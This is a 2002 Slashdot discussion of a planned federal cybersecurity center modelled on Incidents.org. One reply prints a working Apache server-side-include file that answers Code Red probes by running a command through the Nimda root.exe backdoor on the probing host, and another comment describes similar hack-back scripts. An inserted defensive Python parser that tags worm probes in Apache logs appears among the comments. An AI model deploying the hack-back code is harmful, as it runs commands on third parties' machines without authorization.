Security

Federal NOC To Be Modeled After Incidents.org / DS 30

An anonymous reader writes "Computerworld is covering in more detail the new Federal 'Cybersecurity Center.' The article explains that unlike some earlier rumors indicated, the center will not try to build a super-carnivore, but instead use voluntary reports. It will be similar to the SANS Institute's Internet Storm Center, which summarizes contributions submitted to DShield.org. This system of voluntary contributors has been shown to be effective in the past by issuing early warning for a number of major Internet worms, like Code Red, Ramen and SQLSnake. Unlike Symantec's 'for pay' DeepSight service, which publishes alerts only to paying members, Incidents.org is a free service."
  • by valmont ( 3573 ) on Tuesday September 03, 2002 @05:28PM (#4191551) Homepage Journal
    A few months ago I posted a follow-up [slashdot.org] in my /. journal [slashdot.org] on Code Red and Nimda queries sent to my Apache server through my residential DSL connection. I gathered a list of *all* unique queries I've received so far.

    I also came up with a few shell scripts used as CGI to make HTTP requests back to offending hosts, exploiting the very vulnerabilities they're probing me for, to place "WARNING YOU ARE INFECTED" text messages at strategic locations on their hard drives. Drop a note in my journal comments if you need more info on that.
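    A defender-side counterpart to the unique-query list the post describes, added here as an example (not valmont's scripts): it parses Apache access-log lines, tags Code Red and Nimda probes by their request paths, and builds the per-source summary a DShield-style report would carry. The log lines and addresses are constructed.

```python
import re
from collections import defaultdict

# Constructed Apache access-log lines (not from the post); the last one is deliberately malformed.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Sep/2002:17:28:11 -0400] "GET /default.ida?NNNNNNNN%u9090%u6858=a HTTP/1.0" 400 322',
    '192.0.2.10 - - [03/Sep/2002:17:28:12 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210',
    '198.51.100.7 - - [03/Sep/2002:17:30:05 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210',
    '198.51.100.7 - - [03/Sep/2002:17:30:06 -0400] "GET /index.html HTTP/1.1" 200 1024',
    '203.0.113.5 - - [03/Sep/2002:17:31:00 -0400] "GET /_vti_bin/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 210',
    'this line is not a valid access-log record',
]

# Common/combined log format: client, ident, user, [timestamp], "request", status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')

# Request-path markers of the two worms the post mentions: Code Red hits the IIS
# .ida ISAPI filter; Nimda walks a list of root.exe/cmd.exe paths with "/c+dir".
SIGNATURES = {
    "code-red": re.compile(r"^/default\.ida\?", re.I),
    "nimda": re.compile(r"/(root|cmd)\.exe\?/c\+", re.I),
}

def parse_line(line):
    """Split one access-log line into fields; return None for lines that do not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, ts, method, path, status, _size = m.groups()
    return {"src": src, "ts": ts, "method": method, "path": path, "status": int(status)}

def classify(path):
    """Name the worm family a request path matches, or None for ordinary traffic."""
    for family, pat in SIGNATURES.items():
        if pat.search(path):
            return family
    return None

def summarize(lines):
    """Per source host: worm families seen, the unique probe queries, and hit count."""
    report = defaultdict(lambda: {"families": set(), "queries": set(), "hits": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        family = classify(rec["path"])
        if family is None:
            continue
        entry = report[rec["src"]]
        entry["families"].add(family)
        entry["queries"].add(rec["path"])
        entry["hits"] += 1
    return dict(report)
```

    The returned dict is what you would submit to a DShield-style collector; ordinary requests and unparseable lines are dropped before they reach it.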

    • The problem with doing this is that you are committing a criminal offence by doing so. You are effectively and wilfully committing a breach of some computer law in your country.
      It's one of those long discussions for a rainy afternoon, but IMHO you need to be careful doing that. After all, Code Red/Nimda is just a worm, but if someone catches you hacking their server, then it'll be you in trouble.
      Some discussion occurred on various SecurityFocus mailing lists regarding this point. (I haven't posted a link, because the load on the SecurityFocus website is too high at the moment.)
    • I made a .htaccess file containing:

      AddType text/html .ida
      AddHandler server-parsed .ida

      Then made a file called default.ida that looks like this (the part between <!-- and --> is all on one big long line):

      <HTML>
      <HEAD>
      <TITLE>Go away.</TITLE>
      </HEAD>
      <BODY>

      This server runs Apache on Linux. It is immune to Microsoft viruses and worms.
      <!--#exec cmd="/usr/bin/lynx -dump http://$REMOTE_ADDR/scripts/root.exe\?/c+net+send+localhost+%22Your+Web+server+has+been+infected+with+a+virus.++I+know+this+because+your+server+tried+to+infect+my+server.++I+sent+you+this+message+because+I+am+a+nice+guy.++Someone+else+may+not+be+so+nice,+and+this+virus+lets+them+steal+your+data,+erase+your+hard+drive,+or+anything+else+they+want.++Please+fix+your+server,+or+take+it+offline.%22 >/dev/null 2>/dev/null" -->
      </BODY>
      </HTML>
  • On one hand it's free and should provide useful information to keep our networks and computers secure. On the other hand it's run by the government, which of course we all know is bad ... choices, choices :)

    (right now some slashbot's head is exploding! :) )
  • by wowbagger ( 69688 ) on Tuesday September 03, 2002 @05:33PM (#4191573) Homepage Journal
    I just want a way to stop the damn Klez worms I keep getting emailed from pixie.udw.ac.za (a university in South Africa). I've mailed their admin repeatedly, mailed their faculty, even mailed their upstream. The closest thing to a response I've gotten was a response from one of the faculty saying "Yeah, we are getting hammered by that too."

    What we need is a good way to force admins to actually ADMINISTER the systems they are responsible for, and should they refuse, to get the upstream to null-route the machine until it is fixed.
  • I'm a little unsure of what this will accomplish. Is it only going to alert you to the newest threats out there, or is it actually going to give info on how to protect your computer from them as well? Hopefully, one would think one would naturally lead to the other, but as someone already said, this IS the government running it. =)
  • by sjanich ( 431789 ) on Tuesday September 03, 2002 @05:39PM (#4191601)
    Wouldn't it make more sense, instead of spending money building something like incidents.org, to fund incidents.org partially with grant money from the feds, so that it can beef up somewhat, and create a Federal liaison team? They would spend less and get their goal quicker.
    • It would, any fool could see that. So... given that governments usually have a high concentration of fools... we could reasonably assume they already worked that out. Which can only mean that they want to control it. Now why might a government want to suppress computer security alerts...?

    • Not if you want to start doing DShield-like data correlation, but from the ubersecure (snicker) internal government systems.

      People would have an absolute bird if it got out that attempted access logs from #insert government agency here# were being sent to an NGO for correlation.

      Although I won't deny that some greenbacks for incidents.org would be a great idea.
  • Good Idea (Score:2, Insightful)

    by extagboy ( 60672 )
    Seems like a good idea as long as anonymous contributions from the public are welcome and uncensored. If it turns into a government throttled source of information, it won't be any good to anyone.
  • by cfadam ( 220860 ) on Tuesday September 03, 2002 @06:14PM (#4191776)
    Did anyone else notice this statement:

    "In an interview with Computerworld last month, Clarke said the plan may include a governmentwide policy that requires all IT purchases to be independently certified for security prior to approval."

    I would like to know what it takes for a product to get "independently certified for security", and how would/does this affect OSS?

    (If this has been posted and answered in the past, please mod me down.)
    • I would like to know what it takes for a product to get "independently certified for security", and how would/does this affect OSS?

      If this has been posted and answered in the past, please mod me down.

      It has been posted, but not sufficiently answered. :)

      The tentative answers which I have seen seem to end up saying that any commercial certification would probably cost too much for OSS/FREE and that any government cert would be biased by established software companies "adding their expertise and experience to the process". (Unless those commercial certs were aimed specifically at OSS/FREE, in which case they would be the victims of discrediting campaigns by the other commercial certs. Which would leave the costly certs as the only "respectable" certs around.) Much weeping and gnashing of teeth, but I still haven't seen any good solutions. Maybe I've missed something.

      Side note, we do need companies giving input to government regarding what those corporations are knowledgeable about and good at, but that needs to be tempered by honest gov't types who have a clue about the industry. Think USPTO with clueful people running it. EX: I'm not much of a programmer, but if I were reviewing a patent application for a new sort method, I would have a good idea about where to start looking for info.

    • You should want OSS because it respects your rights. You shouldn't care what others use.

      The government (or a company) wants a verified, legit product? Fine. They don't use an OSS OS (like a downloaded copy of Linux), they buy copies of Red Hat Linux.

      Why do you care?

      Why is everyone here worried what other people are doing?

      Alex
      • by cfadam ( 220860 )
        I care because I don't want to see open-source security products viewed as a lesser-quality product due to funding issues on the part of its contributors. If the government is going to install something as important as security software, they should have the right to choose the best product period, not just the best commercial product.

        If the cost of certification is too great, that may also stop smaller security companies from being evaluated as well, also due to funding problems.

        We shouldn't trust our nation's security only to those with deep pockets.

        - A
  • by Anonymous Coward
    Even trolls hate this story? Damn.. such a boring story...
  • I remember reading the exact same article about the NIPC (mentioned in this article), and how it was supposed to do all the things that this center is supposed to do. We have highly paid people running around in very costly facilities who are definitely not the most clued people in the industry, because regardless of the dot-com fallout, network security salaries haven't dropped too much (xxx,000). I wonder if maybe next year, we can build another center so that it can collect data from this new center, plus the NIPC and whatever other centers have been built to either collect data on other centers or from actual events. This is a crock of shit.
  • This is NOT news to anyone that has been following CSRC NIST [nist.gov] SP-800 publications that have been trickling out of Gaithersburg MD for some time. They are even reaching out to small business [nist.gov]

    Establishing a decent list of the telco demarcs and a physical inventory and assessment of vital devices was the 1st thing and probably done to a good tolerance. This is the next step. Get all the traffic reports going to a central NOC.

    NIST has been writing fairly decent and comprehensive publications that deal with firewalls, email, WAP and assessment of security position. And surprisingly, the public it seems has been regularly asked to comment based on what is occurring every day in business IT.

    Currently, with the release of the ASSET evaluation tool, Fed agencies and departments no longer have the rug to sweep years of poor planning and practice under.

    I'd fully expect that in a few years, use of this Federal NOC and its services of cross site and network attack detection ability could be put into a FIPS standard of some sort. Those that deal with GOV will have to deal with GOVs rules.

    If I were a federal law enforcement agency it would be an easy sell.

    Sharing GOV net traffic information parallels the concept of sharing "most wanted" lists, prison rolls, evidence research, cold leads and what not.

    I just wish the US Gov would also do the same for spammers for theft of services!

    It's not a surprise that nearly 100% of all Federal buildings and critical facilities have a small number of meatspace entry points which are screened and watched; why should we expect different for Internet, Extranet and Intranet spaces?

    I foresee the American Internet much like American banks in the 1930's. We are past the "glory" bandits like Bonnie and Clyde stage and are just getting weary of the wannabe criminals.

    It was about that time the FBI was established to chase after cross-jurisdiction criminals. The Bureau, with many other institutions like insurance companies, insisted banks put in physical measures, guards, bars, silent and audible alarms, robbery training for staff, proof of executing government regulations, etc.

    I predict in 8 years the insurance industry will up your premiums for not having a syslog server, not having a written and practiced fair use policy with employees, not having firewalls between vital resources and untrusted segments of your business. Heaven help come audit time!

    My friends, computers are rock, metal, plastic and air -- not majik. Get over it.

    Reading any of the NIST program documents and having any experience with business consolidation helps in what to forecast next.

    My bet is the US Gov will institute internal national EDI networks based on XML exchanges to negotiate terms of service and usage of resources. Quasi-privatized EDI would preclude any undesirables and non-participant networks.

    My 2c

E = MC ** 2 +- 3db